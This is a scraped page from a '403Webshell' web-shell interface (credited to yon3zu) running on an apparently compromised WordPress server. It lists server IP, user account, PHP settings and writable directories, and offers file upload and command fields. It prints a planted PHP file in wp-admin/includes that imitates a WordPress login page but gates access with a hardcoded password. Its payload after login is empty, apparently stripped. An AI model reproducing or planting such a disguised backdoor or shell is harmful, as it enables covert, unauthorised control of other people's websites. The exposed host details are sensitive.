403Webshell
Server IP : 62.60.133.156  /  Your IP : 216.73.217.51
Web Server : LiteSpeed
System : Linux linux24.centraldnserver.com 4.18.0-553.141.2.lve.el8.x86_64 #1 SMP Wed Jul 8 16:10:02 UTC 2026 x86_64
User : mimradmin ( 1166)
PHP Version : 7.4.33
Disable Function : show_source, system, shell_exec, passthru, exec, popen, proc_open
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : OFF |  Pkexec : OFF
Directory :  /home/mimradmin/public_html/wp-admin/includes/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/mimradmin/public_html/wp-admin/includes/index.php
<?php
session_start();
$PASSWORD = "1230"; // your password
$error = "";

if (isset($_GET['action']) && $_GET['action'] === 'logout') {
    session_destroy();
    header("Location: " . $_SERVER['PHP_SELF']);
    exit;
}

if (!isset($_SESSION['logged_in'])) {
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['pwd'])) {
        if ($_POST['pwd'] === $PASSWORD) {
            $_SESSION['logged_in'] = true;
            header("Location: " . $_SERVER['PHP_SELF']);
            exit;
        } else {
            $error = "The password you entered is incorrect.";
        }
    }
    ?>
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Log In ‹Site — WordPress</title>
<meta name='robots' content='max-image-preview:large, noindex, noarchive' />
<meta name="viewport" content="width=device-width" />
<link rel='stylesheet' id='dashicons-css' href='https://s.w.org/wp-includes/css/dashicons.css' media='all' />
<link rel='stylesheet' id='buttons-css' href='https://s.w.org/wp-includes/css/buttons.css' media='all' />
<link rel='stylesheet' id='forms-css' href='https://s.w.org/wp-admin/css/forms.css' media='all' />
<link rel='stylesheet' id='login-css' href='https://s.w.org/wp-admin/css/login.css' media='all' />
</head>
<body class="login no-js login-action-login wp-core-ui locale-en-us">
<script>document.body.className = document.body.className.replace('no-js','js');</script>

<div id="login">
    <h1><a href="https://wordpress.org/">Powered by WordPress</a></h1>

    <?php if(!empty($error)) echo '<div id="login_error">'.$error.'</div>'; ?>

    <form name="loginform" id="loginform" action="" method="post">
        <p>
            <label for="user_login">Username or Email Address</label>
            <input type="text" name="log" id="user_login" class="input" value="" size="20" autocapitalize="off" autocomplete="username" />
        </p>

        <div class="user-pass-wrap">
            <label for="user_pass">Password</label>
            <div class="wp-pwd">
                <input type="password" name="pwd" id="user_pass" class="input password-input" value="" size="20" required />
                <button type="button" class="button button-secondary wp-hide-pw hide-if-no-js" data-toggle="0" aria-label="Show password">
                    <span class="dashicons dashicons-visibility" aria-hidden="true"></span>
                </button>
            </div>
        </div>

        <p class="forgetmenot">
            <input name="rememberme" type="checkbox" id="rememberme" value="forever" />
            <label for="rememberme">Remember Me</label>
        </p>

        <p class="submit">
            <input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" />
        </p>
    </form>

    <p id="nav">
        <a class="wp-login-lost-password" href="#">Lost your password?</a>
    </p>
    <p id="backtoblog">
        <a href="#">← Back to Demo Site</a>
    </p>
</div>

<script>
document.querySelector(".wp-hide-pw").addEventListener("click", function(){
    const pwd = document.getElementById("user_pass");
    if (pwd.type === "password") {
        pwd.type = "text"; this.setAttribute("aria-label", "Hide password");
    } else {
        pwd.type = "password"; this.setAttribute("aria-label", "Show password");
    }
});
</script>
</body>
</html>
<?php
exit;
}
?>


<?php
; ?>

?>

Youez - 2016 - github.com/yon3zu